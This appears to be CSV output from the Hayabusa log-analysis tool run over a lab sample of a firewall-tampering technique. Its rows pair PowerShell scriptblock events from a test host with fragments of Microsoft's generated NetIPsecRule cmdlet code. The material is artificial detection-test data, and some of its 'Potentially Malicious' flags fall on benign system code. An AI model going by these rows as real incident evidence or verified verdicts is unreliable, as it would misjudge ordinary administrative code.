[ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contai",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 